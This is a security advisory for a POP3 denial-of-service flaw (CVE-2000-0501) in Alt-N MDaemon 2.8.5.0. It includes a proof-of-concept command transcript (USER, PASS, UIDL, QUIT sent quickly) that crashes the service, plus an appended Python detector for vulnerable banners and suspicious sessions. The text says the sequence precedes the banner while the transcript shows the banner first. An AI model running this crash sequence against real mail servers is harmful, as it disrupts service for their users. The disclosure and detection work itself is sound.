Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability
BID:1366
Info
| Bugtraq ID: | 1366 |
| Class: | Boundary Condition Error |
| CVE: | CVE-2000-0501 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jun 16 2000 12:00AM |
| Updated: | Mar 19 2015 08:08AM |
| Credit: | Posted to NTBugtraq on June 16, 2000 by Craig <[email protected]>. |
| Vulnerable: | Alt-N MDaemon 2.8.5.0 |
| Not Vulnerable: | Alt-N MDaemon 3.0.4 |
Discussion
A remote user can crash Alt-N MDaemon 2.8.5.0 by issuing the PASS command, then the UIDL command, and then quitting the mail server before UIDL has returned a response. This must be done before the user is presented with the POP3 login banner. The application must be restarted to regain normal functionality.
Exploit / POC
Perform the following very quickly:
+OK <target> POP service ready using MDaemon v2.8.5.0 T
User <username>
+OK <username>... Recipient ok
pass <password>
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK
.
quit
+OK <username> <target> POP Server signing off (mailbox empty)
Solution / Fix
Solution:
Alt-N has rectified this issue in MDaemon V2.8.6.0 and all later versions.
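A defender-side check for the condition described above, as an added example that is not part of the original advisory: it classifies an MDaemon POP3 banner against the versions the advisory names, and flags a session in which the client sends commands before the greeting and issues QUIT right after UIDL with no server reply in between. The `(direction, line)` event format, the function names and the sample sessions are assumptions constructed for illustration.

```python
import re

LISTED_VULNERABLE = (2, 8, 5, 0)   # version the advisory lists as vulnerable
FIRST_FIXED = (2, 8, 6, 0)         # first fixed release per the advisory
BANNER_RE = re.compile(r"MDaemon\s+v(\d+(?:\.\d+)*)", re.I)

def banner_status(banner):
    """Return 'vulnerable', 'fixed', 'unlisted', or None if no MDaemon version is shown."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    parts = tuple(int(p) for p in m.group(1).split("."))
    version = (parts + (0, 0, 0, 0))[:4]      # pad so 2.8.6 compares equal to 2.8.6.0
    if version >= FIRST_FIXED:
        return "fixed"
    # Older releases are not mentioned in the advisory, so they are reported as unlisted.
    return "vulnerable" if version == LISTED_VULNERABLE else "unlisted"

def suspicious_session(events):
    """events: (direction, line) pairs in wire order; 'C' = client, 'S' = server."""
    findings, verbs = [], []
    greeted = uidl_pending = False
    for direction, line in events:
        if direction == "S":                  # simplification: any server line counts as a reply
            greeted, uidl_pending = True, False
            continue
        verb = line.split()[0].upper() if line.strip() else ""
        if not greeted and "pre-greeting command" not in findings:
            findings.append("pre-greeting command")
        if verb == "QUIT" and uidl_pending and "PASS" in verbs:
            findings.append("QUIT before UIDL response")
        uidl_pending = verb == "UIDL"
        verbs.append(verb)
    return findings

# Constructed sample sessions (placeholder host and credentials).
GREETING = ("S", "+OK mail.example.test POP service ready using MDaemon v2.8.5.0")
RACE = [("C", "USER alice"), ("C", "PASS secret"), ("C", "UIDL"), ("C", "QUIT"), GREETING]
NORMAL = [GREETING, ("C", "USER alice"), ("S", "+OK"), ("C", "PASS secret"), ("S", "+OK"),
          ("C", "UIDL"), ("S", "+OK"), ("S", "."), ("C", "QUIT"), ("S", "+OK")]

if __name__ == "__main__":
    print(banner_status(GREETING[1]), suspicious_session(RACE), suspicious_session(NORMAL))
```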